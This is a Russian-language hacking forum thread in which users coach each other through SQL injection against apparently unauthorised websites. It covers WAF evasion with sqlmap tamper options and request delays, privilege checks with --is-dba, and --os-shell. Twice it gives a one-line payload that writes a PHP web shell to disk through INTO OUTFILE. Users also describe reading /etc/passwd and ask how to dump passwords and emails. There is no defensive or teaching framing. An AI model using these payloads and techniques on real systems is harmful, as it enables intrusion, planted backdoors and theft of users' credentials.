Там WAF не самый тоскливый стоит - реагирует практически на все. Не факт что sqlmap так просто с ним справится. Попробуй конечно тамперами пройтись, но меня терзают смутные сомнения... И да - задержку еще попробуй секунд до 5 увеличить - WAF блокирует ип при ошибках примерно на 3-5 сек. Подумал и решил дописать - в данном случае эффективнее будет руками работать. Я так думаю.
Ребята кто подскжет функции для обхода WAf ??? Когда пытаюсь рутить скулю руками блочит ип http://prntscr.com/9gqj9m я так понимаю это реагирует этот чертов WAF... Был бы очень признателен за любу помощь в идеале по джпберу или скупу
Помогите застрял на этом: http://rghost.ru/6mLmfsYLb.view Как мне залить shell поподробнее пожалуйста обьясните!!!
1)Надо узнать полный путь /home/www/ .... /' 2)запрос --is-dba то есть права админа на запись ,если False ,то облом 3)Можешь средставми SQLMAP --os-shell и указываешь полный путь home/www/serv1/ ИЛИ как на твоем скрине Code: select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php' Дальше путь до шелла shell.php?cmd=команда;
по средства --is-dba --random-agent я узнал что права TRUE. Далее делаю как Вы и сказали т.е index.php?id=1 --os-shell --random-agent И у меня показывает вот такую ошибку постоянно, и без --random-agent тоже. http://rghost.ru/7y2N7VBtJ.view Как быть?
Подскажи плиз ещё кое что, тут как быть это уже другой сайт, права здесь тоже TRUE, что тут указывать!??? http://rghost.ru/7zjZgGh7x.view
тут нужно укзаывать полный путь, который обычно можно получить при раскрытии путей (https://www.owasp.org/index.php/Full_Path_Disclosure) Нужно указать путь так ,чтобы туда были права на запись (директория tmp,изображений и т.д) как вариант можно попробовать пункт 4 и сбрутить, но шанс небольшой
Файл /etc/password получилось скачать и просмотреть там логи какие то. Но вот как именно узнать есть или нету права на запись в какой нибудь папке не могу вкурить, и пример команды для залития шелла можно пожалуйста.
а полный путь у вас уже есть? вида /home/www/ ?? Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь "пример команды для залития шелла можно пожалуйста." Code: select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ тут каталог с правами на запись /shell.php'
Полного пути нету, я хз как его найти, пожалуйста братюнь обьясни чё по чём, или напиши в лс я тебе дам ссылку сайта может подскажешь, очень нужен сайт этот
раньше выводились все данные нормально, сегодня пробую и вот такое: среди доступных бд было 4, теперь одна и невозможно ничего вывести. перепроверил - уязвимость осталась. как я понимаю доступа к бд больше нет? не могу даже через --sql-shell select version() вывести. --tamper="between,randomcase,space2comment" -v 3 и -D db_site --tables --technique=B --no-cast -v3 пробовал - не помогло
Ребята, всем привет, я новенький и сразу с вопросом)) Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??
Так, спасибо, но не понял, уязвимый параметр это что то типа "index.php?id=", дело в том что ZAP выдал уязвимость на странице "http://site.ru/"
Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.